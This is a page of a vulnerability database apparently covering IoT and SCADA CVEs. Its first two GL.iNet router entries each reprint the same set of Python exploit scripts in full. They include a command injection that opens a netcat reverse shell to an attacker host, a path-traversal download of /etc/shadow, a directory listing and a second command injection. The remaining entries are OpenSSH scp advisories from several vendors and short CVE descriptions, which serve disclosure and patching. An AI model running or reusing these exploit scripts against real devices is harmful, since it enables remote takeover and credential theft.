VARIoT IoT vulnerabilities database
| VAR-201903-0451 | CVE-2019-6273 | GL.iNet GL-AR300M-Lite Vulnerability related to access control in device firmware |
CVSS V2: 4.0 CVSS V3: 6.5 Severity: MEDIUM |
download_file in GL.iNet GL-AR300M-Lite devices with firmware 2.27 allows remote attackers to download arbitrary files. GL.iNet GL-AR300M-Lite There is an access control vulnerability in the device firmware.Information may be obtained. The GL-AR300M-Lite is a smart wireless router. There is a security vulnerability in GL-AR300M-Lite version 2.27. # Exploit Title: GL-AR300M-Lite Authenticated Command injection - Arbitrary file download - Directory Traversal
# Date: 15/1/2019
# Exploit Author: Pasquale Turi aka boombyte
# Vendor Homepage: https://www.gl-inet.com/
# Software Link: https://www.gl-inet.com/products/gl-ar300m/
# Version: Firmware version 2.27
# CVE : CVE-2019-6272 - CVE-2019-6273 - CVE-2019-6274 - CVE-2019-6275
#CVE-2019-6272 PoC (Command injection):
import requests
rhost='RHOST'
lhost='LHOST'
lport ='LPORT'
password='PASSWORD'
r=requests.get('http://'+rhost+'/login.html')
cookie=r.cookies
r2=requests.get('http://'+rhost+'/cgi-bin/login_cgi?action=checklogin',cookies=cookie)
header={'X-CSRF-TOKEN':r2.text[13:45]}
r3=requests.post('http://'+rhost+'/cgi-bin/login_cgi',headers=header,cookies=r2.cookies,data={'action':'login','password':password,'code':''})
header={'X-CSRF-TOKEN':r3.text[31:63]}
r4=requests.post('http://'+rhost+'/cgi-bin/login_cgi',headers=header,cookies=r3.cookies,data={'action':'settimezone','timezone':'`nc '+lhost+' '+lport+' -e /bin/ash`'})
#CVE-2019-6273 (Arbitrary file download) PoC:
import requests
rhost='RHOST'
password='PASSWORD'
file_path='/etc/shadow'
r=requests.get('http://'+rhost+'/login.html')
cookie=r.cookies
r2=requests.get('http://'+rhost+'/cgi-bin/login_cgi?action=checklogin',cookies=cookie)
header={'X-CSRF-TOKEN':r2.text[13:45]}
r3=requests.post('http://'+rhost+'/cgi-bin/login_cgi',headers=header,cookies=r2.cookies,data={'action':'login','password':password,'code':''})
header={'X-CSRF-TOKEN':r3.text[31:63]}
r4=requests.get('http://'+rhost+'/cgi-bin/download_file?/mnt/..'+file_path,headers=header,cookies=r3.cookies)
print r4.text
#CVE-2019-6274 (Path Trasversal) PoC:
import requests
rhost='RHOST'
password='PASSWORD'
path='/'
r=requests.get('http://'+rhost+'/login.html')
cookie=r.cookies
r2=requests.get('http://'+rhost+'/cgi-bin/login_cgi?action=checklogin',cookies=cookie)
header={'X-CSRF-TOKEN':r2.text[13:45]}
r3=requests.post('http://'+rhost+'/cgi-bin/login_cgi',headers=header,cookies=r2.cookies,data={'action':'login','password':password,'code':''})
header={'X-CSRF-TOKEN':r3.text[31:63]}
r4=requests.get('http://'+rhost+'/cgi-bin/storage_cgi?id=2&pwd='+path,headers=header,cookies=r3.cookies)
print r4.text
#CVE-2019-6275 (Another command injection):
import requests
rhost='RHOST'
lhost='LHOST'
lport ='LPORT'
password='PASSWORD'
r=requests.get('http://'+rhost+'/login.html')
cookie=r.cookies
r2=requests.get('http://'+rhost+'/cgi-bin/login_cgi?action=checklogin',cookies=cookie)
header={'X-CSRF-TOKEN':r2.text[13:45]}
r3=requests.post('http://'+rhost+'/cgi-bin/login_cgi',headers=header,cookies=r2.cookies,data={'action':'login','password':password,'code':''})
header={'X-CSRF-TOKEN':r3.text[31:63]}
r4=requests.post('http://'+rhost+'/cgi-bin/firmware_cgi?action=setautoupdate&auto_update=off&update_time=04%3a00%7cecho%20qydre8t159%201%7c%7ca%20%23\'%20%7cecho%20%20%60id%60%7c%7ca%20%23%7c%22%20%7cecho%20a%201%7c%7ca%20%23&_=1547223055153 ',headers=header,cookies=r3.cookies,)
print r4.text
| VAR-201903-0453 | CVE-2019-6275 | GL.iNet GL-AR300M-Lite Command injection vulnerability in device firmware |
CVSS V2: 6.5 CVSS V3: 8.8 Severity: HIGH |
Command injection vulnerability in firmware_cgi in GL.iNet GL-AR300M-Lite devices with firmware 2.27 allows remote attackers to execute arbitrary code. GL.iNet GL-AR300M-Lite The device firmware contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. GL-AR300M-Lite is a smart wireless router.
A command injection vulnerability exists in GL-AR300M-Lite version 2.27. Currently there is no information about this vulnerability, please keep an eye on CNNVD or vendor announcements. # Exploit Title: GL-AR300M-Lite Authenticated Command injection - Arbitrary file download - Directory Traversal
# Date: 15/1/2019
# Exploit Author: Pasquale Turi aka boombyte
# Vendor Homepage: https://www.gl-inet.com/
# Software Link: https://www.gl-inet.com/products/gl-ar300m/
# Version: Firmware version 2.27
# CVE : CVE-2019-6272 - CVE-2019-6273 - CVE-2019-6274 - CVE-2019-6275
#CVE-2019-6272 PoC (Command injection):
import requests
rhost='RHOST'
lhost='LHOST'
lport ='LPORT'
password='PASSWORD'
r=requests.get('http://'+rhost+'/login.html')
cookie=r.cookies
r2=requests.get('http://'+rhost+'/cgi-bin/login_cgi?action=checklogin',cookies=cookie)
header={'X-CSRF-TOKEN':r2.text[13:45]}
r3=requests.post('http://'+rhost+'/cgi-bin/login_cgi',headers=header,cookies=r2.cookies,data={'action':'login','password':password,'code':''})
header={'X-CSRF-TOKEN':r3.text[31:63]}
r4=requests.post('http://'+rhost+'/cgi-bin/login_cgi',headers=header,cookies=r3.cookies,data={'action':'settimezone','timezone':'`nc '+lhost+' '+lport+' -e /bin/ash`'})
#CVE-2019-6273 (Arbitrary file download) PoC:
import requests
rhost='RHOST'
password='PASSWORD'
file_path='/etc/shadow'
r=requests.get('http://'+rhost+'/login.html')
cookie=r.cookies
r2=requests.get('http://'+rhost+'/cgi-bin/login_cgi?action=checklogin',cookies=cookie)
header={'X-CSRF-TOKEN':r2.text[13:45]}
r3=requests.post('http://'+rhost+'/cgi-bin/login_cgi',headers=header,cookies=r2.cookies,data={'action':'login','password':password,'code':''})
header={'X-CSRF-TOKEN':r3.text[31:63]}
r4=requests.get('http://'+rhost+'/cgi-bin/download_file?/mnt/..'+file_path,headers=header,cookies=r3.cookies)
print r4.text
#CVE-2019-6274 (Path Trasversal) PoC:
import requests
rhost='RHOST'
password='PASSWORD'
path='/'
r=requests.get('http://'+rhost+'/login.html')
cookie=r.cookies
r2=requests.get('http://'+rhost+'/cgi-bin/login_cgi?action=checklogin',cookies=cookie)
header={'X-CSRF-TOKEN':r2.text[13:45]}
r3=requests.post('http://'+rhost+'/cgi-bin/login_cgi',headers=header,cookies=r2.cookies,data={'action':'login','password':password,'code':''})
header={'X-CSRF-TOKEN':r3.text[31:63]}
r4=requests.get('http://'+rhost+'/cgi-bin/storage_cgi?id=2&pwd='+path,headers=header,cookies=r3.cookies)
print r4.text
#CVE-2019-6275 (Another command injection):
import requests
rhost='RHOST'
lhost='LHOST'
lport ='LPORT'
password='PASSWORD'
r=requests.get('http://'+rhost+'/login.html')
cookie=r.cookies
r2=requests.get('http://'+rhost+'/cgi-bin/login_cgi?action=checklogin',cookies=cookie)
header={'X-CSRF-TOKEN':r2.text[13:45]}
r3=requests.post('http://'+rhost+'/cgi-bin/login_cgi',headers=header,cookies=r2.cookies,data={'action':'login','password':password,'code':''})
header={'X-CSRF-TOKEN':r3.text[31:63]}
r4=requests.post('http://'+rhost+'/cgi-bin/firmware_cgi?action=setautoupdate&auto_update=off&update_time=04%3a00%7cecho%20qydre8t159%201%7c%7ca%20%23\'%20%7cecho%20%20%60id%60%7c%7ca%20%23%7c%22%20%7cecho%20a%201%7c%7ca%20%23&_=1547223055153 ',headers=header,cookies=r3.cookies,)
print r4.text
| VAR-201901-0012 | CVE-2019-6111 | OpenSSH Input validation vulnerability |
CVSS V2: 5.8 CVSS V3: 5.9 Severity: MEDIUM |
An issue was discovered in OpenSSH 7.9. Due to the scp implementation being derived from 1983 rcp, the server chooses which files/directories are sent to the client. However, the scp client only performs cursory validation of the object name returned (only directory traversal attacks are prevented). A malicious scp server (or Man-in-The-Middle attacker) can overwrite arbitrary files in the scp client target directory. If recursive operation (-r) is performed, the server can manipulate subdirectories as well (for example, to overwrite the .ssh/authorized_keys file). OpenSSH Contains an input validation vulnerability.Information may be tampered with. OpenSSH is prone to an arbitrary file-overwrite vulnerability.
Successful exploits may allow an attacker to overwrite arbitrary files in the context of the user running the affected application.
OpenSSH 7.9 and prior versions are vulnerable. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201903-16
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
https://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: OpenSSH: Multiple vulnerabilities
Date: March 20, 2019
Bugs: #675520, #675522
ID: 201903-16
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in OpenSSH, the worst of which
could allow a remote attacker to gain unauthorized access.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-misc/openssh < 7.9_p1-r4 >= 7.9_p1-r4
Description
===========
Multiple vulnerabilities have been discovered in OpenSSH. Please review
the CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All OpenSSH users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-misc/openssh-7.9_p1-r4"
References
==========
[ 1 ] CVE-2018-20685
https://nvd.nist.gov/vuln/detail/CVE-2018-20685
[ 2 ] CVE-2019-6109
https://nvd.nist.gov/vuln/detail/CVE-2019-6109
[ 3 ] CVE-2019-6110
https://nvd.nist.gov/vuln/detail/CVE-2019-6110
[ 4 ] CVE-2019-6111
https://nvd.nist.gov/vuln/detail/CVE-2019-6111
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
https://security.gentoo.org/glsa/201903-16
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2019 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
https://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
=====================================================================
Red Hat Security Advisory
Synopsis: Moderate: openssh security, bug fix, and enhancement update
Advisory ID: RHSA-2019:3702-01
Product: Red Hat Enterprise Linux
Advisory URL: https://access.redhat.com/errata/RHSA-2019:3702
Issue date: 2019-11-05
CVE Names: CVE-2018-20685 CVE-2019-6109 CVE-2019-6111
=====================================================================
1. Summary:
An update for openssh is now available for Red Hat Enterprise Linux 8.
Red Hat Product Security has rated this update as having a security impact
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available for each vulnerability from
the CVE link(s) in the References section. Relevant releases/architectures:
Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64
Red Hat Enterprise Linux BaseOS (v. 8) - aarch64, ppc64le, s390x, x86_64
3. Description:
OpenSSH is an SSH protocol implementation supported by a number of Linux,
UNIX, and similar operating systems. It includes the core files necessary
for both the OpenSSH client and server.
The following packages have been upgraded to a later upstream version:
openssh (8.0p1).
Additional Changes:
For detailed information on changes in this release, see the Red Hat
Enterprise Linux 8.1 Release Notes linked from the References section. Solution:
For details on how to apply this update, which includes the changes
described in this advisory, refer to:
https://access.redhat.com/articles/11258
After installing this update, the OpenSSH server daemon (sshd) will be
restarted automatically.
1686065 - SSH connections get closed when time-based rekeyring is used and ClientAliveMaxCount=0
1691045 - Rebase OpenSSH to latest release (8.0p1?)
1707485 - Use high-level API to do signatures
1712436 - MD5 is used when writing password protected PEM
1732424 - ssh-keygen -A fails in FIPS mode because of DSA key
1732449 - rsa-sha2-*-cert-v01@openssh.com host key types are ignored in FIPS despite being in the policy
6. Package List:
Red Hat Enterprise Linux AppStream (v. 8):
aarch64:
openssh-askpass-8.0p1-3.el8.aarch64.rpm
openssh-askpass-debuginfo-8.0p1-3.el8.aarch64.rpm
openssh-cavs-debuginfo-8.0p1-3.el8.aarch64.rpm
openssh-clients-debuginfo-8.0p1-3.el8.aarch64.rpm
openssh-debuginfo-8.0p1-3.el8.aarch64.rpm
openssh-debugsource-8.0p1-3.el8.aarch64.rpm
openssh-keycat-debuginfo-8.0p1-3.el8.aarch64.rpm
openssh-ldap-debuginfo-8.0p1-3.el8.aarch64.rpm
openssh-server-debuginfo-8.0p1-3.el8.aarch64.rpm
pam_ssh_agent_auth-debuginfo-0.10.3-7.3.el8.aarch64.rpm
ppc64le:
openssh-askpass-8.0p1-3.el8.ppc64le.rpm
openssh-askpass-debuginfo-8.0p1-3.el8.ppc64le.rpm
openssh-cavs-debuginfo-8.0p1-3.el8.ppc64le.rpm
openssh-clients-debuginfo-8.0p1-3.el8.ppc64le.rpm
openssh-debuginfo-8.0p1-3.el8.ppc64le.rpm
openssh-debugsource-8.0p1-3.el8.ppc64le.rpm
openssh-keycat-debuginfo-8.0p1-3.el8.ppc64le.rpm
openssh-ldap-debuginfo-8.0p1-3.el8.ppc64le.rpm
openssh-server-debuginfo-8.0p1-3.el8.ppc64le.rpm
pam_ssh_agent_auth-debuginfo-0.10.3-7.3.el8.ppc64le.rpm
s390x:
openssh-askpass-8.0p1-3.el8.s390x.rpm
openssh-askpass-debuginfo-8.0p1-3.el8.s390x.rpm
openssh-cavs-debuginfo-8.0p1-3.el8.s390x.rpm
openssh-clients-debuginfo-8.0p1-3.el8.s390x.rpm
openssh-debuginfo-8.0p1-3.el8.s390x.rpm
openssh-debugsource-8.0p1-3.el8.s390x.rpm
openssh-keycat-debuginfo-8.0p1-3.el8.s390x.rpm
openssh-ldap-debuginfo-8.0p1-3.el8.s390x.rpm
openssh-server-debuginfo-8.0p1-3.el8.s390x.rpm
pam_ssh_agent_auth-debuginfo-0.10.3-7.3.el8.s390x.rpm
x86_64:
openssh-askpass-8.0p1-3.el8.x86_64.rpm
openssh-askpass-debuginfo-8.0p1-3.el8.x86_64.rpm
openssh-cavs-debuginfo-8.0p1-3.el8.x86_64.rpm
openssh-clients-debuginfo-8.0p1-3.el8.x86_64.rpm
openssh-debuginfo-8.0p1-3.el8.x86_64.rpm
openssh-debugsource-8.0p1-3.el8.x86_64.rpm
openssh-keycat-debuginfo-8.0p1-3.el8.x86_64.rpm
openssh-ldap-debuginfo-8.0p1-3.el8.x86_64.rpm
openssh-server-debuginfo-8.0p1-3.el8.x86_64.rpm
pam_ssh_agent_auth-debuginfo-0.10.3-7.3.el8.x86_64.rpm
Red Hat Enterprise Linux BaseOS (v. 8):
Source:
openssh-8.0p1-3.el8.src.rpm
aarch64:
openssh-8.0p1-3.el8.aarch64.rpm
openssh-askpass-debuginfo-8.0p1-3.el8.aarch64.rpm
openssh-cavs-8.0p1-3.el8.aarch64.rpm
openssh-cavs-debuginfo-8.0p1-3.el8.aarch64.rpm
openssh-clients-8.0p1-3.el8.aarch64.rpm
openssh-clients-debuginfo-8.0p1-3.el8.aarch64.rpm
openssh-debuginfo-8.0p1-3.el8.aarch64.rpm
openssh-debugsource-8.0p1-3.el8.aarch64.rpm
openssh-keycat-8.0p1-3.el8.aarch64.rpm
openssh-keycat-debuginfo-8.0p1-3.el8.aarch64.rpm
openssh-ldap-8.0p1-3.el8.aarch64.rpm
openssh-ldap-debuginfo-8.0p1-3.el8.aarch64.rpm
openssh-server-8.0p1-3.el8.aarch64.rpm
openssh-server-debuginfo-8.0p1-3.el8.aarch64.rpm
pam_ssh_agent_auth-0.10.3-7.3.el8.aarch64.rpm
pam_ssh_agent_auth-debuginfo-0.10.3-7.3.el8.aarch64.rpm
ppc64le:
openssh-8.0p1-3.el8.ppc64le.rpm
openssh-askpass-debuginfo-8.0p1-3.el8.ppc64le.rpm
openssh-cavs-8.0p1-3.el8.ppc64le.rpm
openssh-cavs-debuginfo-8.0p1-3.el8.ppc64le.rpm
openssh-clients-8.0p1-3.el8.ppc64le.rpm
openssh-clients-debuginfo-8.0p1-3.el8.ppc64le.rpm
openssh-debuginfo-8.0p1-3.el8.ppc64le.rpm
openssh-debugsource-8.0p1-3.el8.ppc64le.rpm
openssh-keycat-8.0p1-3.el8.ppc64le.rpm
openssh-keycat-debuginfo-8.0p1-3.el8.ppc64le.rpm
openssh-ldap-8.0p1-3.el8.ppc64le.rpm
openssh-ldap-debuginfo-8.0p1-3.el8.ppc64le.rpm
openssh-server-8.0p1-3.el8.ppc64le.rpm
openssh-server-debuginfo-8.0p1-3.el8.ppc64le.rpm
pam_ssh_agent_auth-0.10.3-7.3.el8.ppc64le.rpm
pam_ssh_agent_auth-debuginfo-0.10.3-7.3.el8.ppc64le.rpm
s390x:
openssh-8.0p1-3.el8.s390x.rpm
openssh-askpass-debuginfo-8.0p1-3.el8.s390x.rpm
openssh-cavs-8.0p1-3.el8.s390x.rpm
openssh-cavs-debuginfo-8.0p1-3.el8.s390x.rpm
openssh-clients-8.0p1-3.el8.s390x.rpm
openssh-clients-debuginfo-8.0p1-3.el8.s390x.rpm
openssh-debuginfo-8.0p1-3.el8.s390x.rpm
openssh-debugsource-8.0p1-3.el8.s390x.rpm
openssh-keycat-8.0p1-3.el8.s390x.rpm
openssh-keycat-debuginfo-8.0p1-3.el8.s390x.rpm
openssh-ldap-8.0p1-3.el8.s390x.rpm
openssh-ldap-debuginfo-8.0p1-3.el8.s390x.rpm
openssh-server-8.0p1-3.el8.s390x.rpm
openssh-server-debuginfo-8.0p1-3.el8.s390x.rpm
pam_ssh_agent_auth-0.10.3-7.3.el8.s390x.rpm
pam_ssh_agent_auth-debuginfo-0.10.3-7.3.el8.s390x.rpm
x86_64:
openssh-8.0p1-3.el8.x86_64.rpm
openssh-askpass-debuginfo-8.0p1-3.el8.x86_64.rpm
openssh-cavs-8.0p1-3.el8.x86_64.rpm
openssh-cavs-debuginfo-8.0p1-3.el8.x86_64.rpm
openssh-clients-8.0p1-3.el8.x86_64.rpm
openssh-clients-debuginfo-8.0p1-3.el8.x86_64.rpm
openssh-debuginfo-8.0p1-3.el8.x86_64.rpm
openssh-debugsource-8.0p1-3.el8.x86_64.rpm
openssh-keycat-8.0p1-3.el8.x86_64.rpm
openssh-keycat-debuginfo-8.0p1-3.el8.x86_64.rpm
openssh-ldap-8.0p1-3.el8.x86_64.rpm
openssh-ldap-debuginfo-8.0p1-3.el8.x86_64.rpm
openssh-server-8.0p1-3.el8.x86_64.rpm
openssh-server-debuginfo-8.0p1-3.el8.x86_64.rpm
pam_ssh_agent_auth-0.10.3-7.3.el8.x86_64.rpm
pam_ssh_agent_auth-debuginfo-0.10.3-7.3.el8.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2018-20685
https://access.redhat.com/security/cve/CVE-2019-6109
https://access.redhat.com/security/cve/CVE-2019-6111
https://access.redhat.com/security/updates/classification/#moderate
https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.1_release_notes/
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2019 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIVAwUBXcHzKNzjgjWX9erEAQiytQ/6Apphov2V0QmnXA+KO3ZZKBPXtgKv8Sv1
dPtXhTC+Keq4yX9/bXlIuyk6BUsMeaiIMlL5bSSKtq2I7rVxwubTcPX4rD+pQvx8
ArNJgn7U2/3xqwc0R8dNXx6o8vB1M6jXDtu8fKJOxW48evDJf6gE4gX2KUM9yxR2
MhCoHVkLp9a5f0T11yFPI11H0P8gXXQgboAkdt82Ui35T4tD8RndVyPCsllN2c/X
QCCbvZ9e8OLJJoxsOryLcw8tpQHXK2AJMXWv0Us99kQtbaBULWWahhrg/tftLxtT
pILFBaB/RsmGg1O6OkxJ2CuKl6ATC2Wlj/Z7uYPrS7MQDn+fXkH2gfcjb4Z4rqIL
IyKbUpsyFEAaV5rJUeRaS7dGfuQldQbS96P8lUpCcOXPbYD8FgTrW2q3NjOKgYMU
+gh2xPwmlRm+iYfmedPoR2+bTWNYv8JS+Cp/fZF4IFx2EJPQcxKLYshNKgcfkNkR
rIZ4brUI79p84H01TcTh4mFAbR63Y+c36UAI3/fM/W/RkZn/PdoJtpfwg/tjOYZH
rt9kL7SfAEhjHNtBuJGNol6e124srS6300hnfFovAr6llDOcYlrh3ZgVZjVrn6E8
TZhyZ84TGMOqykfH7B9XkJH82X+x3rd2m0ovCPq+Ly62BasdXVd0C2snzbx8OAM8
I+am8dhVlyM=
=iPw4
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
.
Description
-----------
Many scp clients fail to verify if the objects returned by the scp server match those
it asked for. This issue dates back to 1983 and rcp, on which scp is based. A separate
flaw in the client allows the target directory attributes to be changed arbitrarily.
Finally, two vulnerabilities in clients may allow server to spoof the client output.
Details
-------
The discovered vulnerabilities, described in more detail below, enables the attack
described here in brief.
1. The transfer of extra files is hidden by sending ANSI control sequences
via stderr. For example:
user@local:~$ scp user@remote:readme.txt .
readme.txt 100% 494 1.6KB/s 00:00
user@local:~$
2. Once the victim launches a new shell, the malicious commands in .bash_aliases get
executed.
*) Man-in-the-Middle attack does require the victim to accept the wrong host
fingerprint.
Vulnerabilities
---------------
1.
2.
The same vulnerability in WinSCP is known as CVE-2018-20684.
3. CWE-451: scp client spoofing via object name [CVE-2019-6109]
Due to missing character encoding in the progress display, the object name can be used
to manipulate the client output, for example to employ ANSI codes to hide additional
files being transferred.
4.
Proof-of-Concept
----------------
Proof of concept malicious scp server will be released at a later date.
Vulnerable versions
-------------------
The following software packages have some or all vulnerabilities:
ver #1 #2 #3 #4
OpenSSH scp <=7.9 x x x x
PuTTY PSCP ? - - x x
WinSCP scp mode <=5.13 - x - -
Tectia SSH scpg3 is not affected since it exclusively uses sftp protocol.
Mitigation
----------
1. OpenSSH
1.1 Switch to sftp if possible
1.2 Alternatively apply the following patch to harden scp against most server-side
manipulation attempts: https://sintonen.fi/advisories/scp-name-validator.patch
NOTE: This patch may cause problems if the the remote and local shells don't
agree on the way glob() pattern matching works. YMMV.
2. PuTTY
2.1 No fix is available yet
3. WinSCP
3.1. Upgrade to WinSCP 5.14 or later
Similar or prior work
---------------------
1. https://www.jeffgeerling.com/blog/brief-history-ssh-and-remote-access
Credits
-------
The vulnerability was discovered by Harry Sintonen / F-Secure Corporation.
Timeline
--------
2018.08.08 initial discovery of vulnerabilities #1 and #2
2018.08.09 reported vulnerabilities #1 and #2 to OpenSSH
2018.08.10 OpenSSH acknowledged the vulnerabilities
2018.08.14 discovered & reported vulnerability #3 to OpenSSH
2018.08.15 discovered & reported vulnerability #4 to OpenSSH
2018.08.30 reported PSCP vulnerabilities (#3 and #4) to PuTTY developers
2018.08.31 reported WinSCP vulnerability (#2) to WinSCP developers
2018.09.04 WinSCP developers reported the vulnerability #2 fixed
2018.11.12 requested a status update from OpenSSH
2018.11.16 OpenSSH fixed vulnerability #1
2019.01.07 requested a status update from OpenSSH
2019.01.08 requested CVE assignments from MITRE
2019.01.10 received CVE assignments from MITRE
2019.01.11 public disclosure of the advisory
2019.01.14 added a warning about the potential issues caused by the patch
. ==========================================================================
Ubuntu Security Notice USN-3885-2
March 04, 2019
openssh vulnerability
==========================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 18.10
- Ubuntu 18.04 LTS
- Ubuntu 16.04 LTS
- Ubuntu 14.04 LTS
Summary:
One of the fixes in USN-3885-1 was incomplete.
Software Description:
- openssh: secure shell (SSH) for secure access to remote machines
Details:
USN-3885-1 fixed vulnerabilities in OpenSSH. It was discovered that the fix
for CVE-2019-6111 turned out to be incomplete. This update fixes the
problem.
Original advisory details:
Harry Sintonen discovered multiple issues in the OpenSSH scp utility.
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 18.10:
openssh-client 1:7.7p1-4ubuntu0.3
Ubuntu 18.04 LTS:
openssh-client 1:7.6p1-4ubuntu0.3
Ubuntu 16.04 LTS:
openssh-client 1:7.2p2-4ubuntu2.8
Ubuntu 14.04 LTS:
openssh-client 1:6.6p1-2ubuntu2.13
In general, a standard system update will make all the necessary changes. All the vulnerabilities
are in found in the scp client implementing the SCP protocol.
The check added in this version can lead to regression if the client and
the server have differences in wildcard expansion rules. If the server is
trusted for that purpose, the check can be disabled with a new -T option to
the scp client.
For the stable distribution (stretch), these problems have been fixed in
version 1:7.4p1-10+deb9u5.
For the detailed security status of openssh please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/openssh
Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/
Mailing list: debian-security-announce@lists.debian.org
-----BEGIN PGP SIGNATURE-----
iQEzBAEBCgAdFiEE8vi34Qgfo83x35gF3rYcyPpXRFsFAlxe0w0ACgkQ3rYcyPpX
RFs85AgA0GrSHO4Qf5FVsE3oXa+nMkZ4U6pbOA9dHotX54DEyNuIJrOsOv01cFxQ
t2Z6uDkZptmHZT4uSWg2xIgMvpkGo9906ziZfHc0LTuHl8j++7cCDIDGZBm/iZaX
ueQfl85gHDpte41JvUtpSBAwk1Bic7ltLUPDIGEiq6nQboxHIzsU7ULVb1l0wNxF
sEFDPWGBS01HTa+QWgQaG/wbEhMRDcVz1Ck7dqpT2soQRohDWxU01j14q1EKe9O9
GHiWECvFSHBkkI/v8lNfSWnOWYa/+Aknri0CpjPc/bqh2Yx9rgp/Q5+FJ/FxJjmC
bHFd+tbxB1LxEO96zKguYpPIzw7Kcw==
=5Fd8
-----END PGP SIGNATURE-----
| VAR-201903-1200 | CVE-2018-19694 | Netbiter WS100 Cross-Site Scripting Vulnerability |
CVSS V2: 4.3 CVSS V3: 6.1 Severity: MEDIUM |
HMS Industrial Networks Netbiter WS100 3.30.5 devices and previous have reflected XSS in the login form. The Netbiter WS100 is a remote management solution for industrial control (eg emergency generators). A cross-site scripting vulnerability exists in Netbiter WS100. An attacker can exploit a vulnerability to inject arbitrary web scripts or HTML. The vulnerability stems from the lack of correct validation of client data in WEB applications
| VAR-201901-0308 | CVE-2019-6447 | Android for ES File Explorer File Manager Application input validation vulnerability |
CVSS V2: 4.8 CVSS V3: 8.1 Severity: HIGH |
The ES File Explorer File Manager application through 4.1.9.7.4 for Android allows remote attackers to read arbitrary files or execute applications via TCP port 59777 requests on the local Wi-Fi network. This TCP port remains open after the ES application has been launched once, and responds to unauthenticated application/json data over HTTP
| VAR-201902-0650 | CVE-2018-18996 | LCDS Laquis SCADA Authorization vulnerability |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: HIGH |
LCDS Laquis SCADA prior to version 4.1.0.4150 allows taking in user input without proper authorization or sanitation, which may allow an attacker to execute remote code on the server. LCDS Laquis SCADA Contains an authorization vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Authentication is not required to exploit this vulnerability. The specific flaw exists within the processing of calls to relatorionome.lhtml. When parsing the NOME Element, the process does not properly sanitize user-supplied data, which can lead to the injection of an arbitrary script. An attacker can leverage this vulnerability to execute code in the context of the aq process. LCDS LAquis SCADA is a SCADA (Data Acquisition and Monitoring Control) system from LCDS, Brazil. The system is mainly used for data acquisition and process control of devices with communication technology. LCDS LAquis SCADA is prone to multiple security vulnerabilities.
An attacker may leverage these issues to execute arbitrary code, perform unauthorized actions or gain access to sensitive information that may aid in further attacks. Failed attempts will likely cause a denial-of-service condition.
LCDS LAquis SCADA version 4.1.0.3870 is vulnerable; other versions may also be affected
| VAR-201902-0647 | CVE-2018-18988 | LAquis SCADA Input validation vulnerability |
CVSS V2: 7.5 CVSS V3: 8.8 Severity: HIGH |
LCDS Laquis SCADA prior to version 4.1.0.4150 allows execution of script code by opening a specially crafted report format file. This may allow remote code execution, data exfiltration, or cause a system crash. This vulnerability allows remote attackers to create arbitrary files on vulnerable installations of LAquis SCADA Software. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the processing of LGX report files. Script embedded in a crafted file can create files in arbitrary locations using the Ini.WriteString method. An attacker can leverage this vulnerability to execute code in the context of the current user. The issue results from the lack of proper validation of a user-supplied value prior to dereferencing it as a pointer. LAquis SCADA is a suite of SCADA software for monitoring and data acquisition. LCDS LAquis SCADA is prone to multiple security vulnerabilities. Failed attempts will likely cause a denial-of-service condition.
LCDS LAquis SCADA version 4.1.0.3870 is vulnerable; other versions may also be affected
| VAR-201902-0651 | CVE-2018-18998 | LCDS Laquis SCADA Vulnerabilities related to the use of hard-coded credentials |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
LCDS Laquis SCADA prior to version 4.1.0.4150 uses hard coded credentials, which may allow an attacker unauthorized access to the system with high privileges. LCDS Laquis SCADA Contains a vulnerability in the use of hard-coded credentials.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows remote attackers to bypass authentication on vulnerable installations of LAquis SCADA Software. Authentication is not required to exploit this vulnerability. The specific flaw exists within the processing of login requests to the product's webserver. The product contains a hard-coded password for a number of undocumented accounts. An attacker can leverage this vulnerability to bypass authentication on the system. LCDS LAquis SCADA is a SCADA (Data Acquisition and Monitoring Control) system from LCDS, Brazil. The system is mainly used for data acquisition and process control of devices with communication technology. A security vulnerability exists in the LCDS LAquis SCADA version 4.1.0.3870, which stems from the fact that the program uses hard-coded credentials. LCDS LAquis SCADA is prone to multiple security vulnerabilities.
